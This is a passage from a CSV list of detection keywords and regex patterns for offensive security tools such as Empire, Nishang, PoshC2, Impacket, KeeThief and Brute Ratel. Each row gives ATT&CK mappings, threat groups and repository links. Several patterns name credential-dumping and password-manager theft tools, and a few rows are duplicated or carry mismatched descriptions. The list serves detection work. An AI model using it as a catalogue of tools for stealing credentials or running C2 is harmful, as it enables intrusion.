T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*getPac.py*",".{0,1000}getPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Get-PacketNetBIOSSessionService*",".{0,1000}Get\-PacketNetBIOSSessionService.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketNTLMSSPAuth*",".{0,1000}Get\-PacketNTLMSSPAuth.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketNTLMSSPNegotiate*",".{0,1000}Get\-PacketNTLMSSPNegotiate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketRPCBind*",".{0,1000}Get\-PacketRPCBind.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketRPCRequest*",".{0,1000}Get\-PacketRPCRequest.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PacketSMB*",".{0,1000}Get\-PacketSMB.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PassHashes*",".{0,1000}Get\-PassHashes.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-PassHashes.ps1*",".{0,1000}Get\-PassHashes\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-PassHints*",".{0,1000}Get\-PassHints.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*get-passnotexp*",".{0,1000}get\-passnotexp.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*get-password-policy.py*",".{0,1000}get\-password\-policy\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Get-PEBasicInfo*",".{0,1000}Get\-PEBasicInfo.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-PEHeader.ps1*",".{0,1000}Get\-PEHeader\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*getPositionImplant*",".{0,1000}getPositionImplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Get-PotentialDLLHijack*",".{0,1000}Get\-PotentialDLLHijack.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*Get-PrivilegedGroupAccounts*",".{0,1000}Get\-PrivilegedGroupAccounts.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-PrivilegedGroupMembership*",".{0,1000}Get\-PrivilegedGroupMembership.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - 
TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*getprivs.bin*",".{0,1000}getprivs\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*getprivs.exe*",".{0,1000}getprivs\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*get-process *amsi.dll*",".{0,1000}get\-process\s.{0,1000}amsi\.dll.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*GetProcHandleClient.exe *",".{0,1000}GetProcHandleClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*getProcUAC1password.h*",".{0,1000}getProcUAC1password\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*Get-RBCD-Threaded*",".{0,1000}Get\-RBCD\-Threaded.{0,1000}","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","1","N/A","N/A","2","117","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" "*Get-RegistryAlwaysInstallElevated*",".{0,1000}Get\-RegistryAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-RegistryAlwaysInstallElevated*",".{0,1000}Get\-RegistryAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-RegistryAutoLogon*",".{0,1000}Get\-RegistryAutoLogon.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetRektBoy724/SharpUnhooker*",".{0,1000}GetRektBoy724\/SharpUnhooker.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","379","76","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z" "*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","AD 
exploitation cheat sheet","Get cached credentials (if any)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteCachedCredential*",".{0,1000}Get\-RemoteCachedCredential.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteDesktopUserSessionList*",".{0,1000}Get\-RemoteDesktopUserSessionList.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-RemoteDesktopUserSessionList.*",".{0,1000}Get\-RemoteDesktopUserSessionList\..{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get local 
account hashes","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteLocalAccountHash*",".{0,1000}Get\-RemoteLocalAccountHash.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*Get-RemoteLocalAccountHash.json*",".{0,1000}Get\-RemoteLocalAccountHash\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Get-RemoteMachineAccountHash*",".{0,1000}Get\-RemoteMachineAccountHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Get machine account hash for silver ticket attack","T1110","TA0006","N/A","N/A","Credential 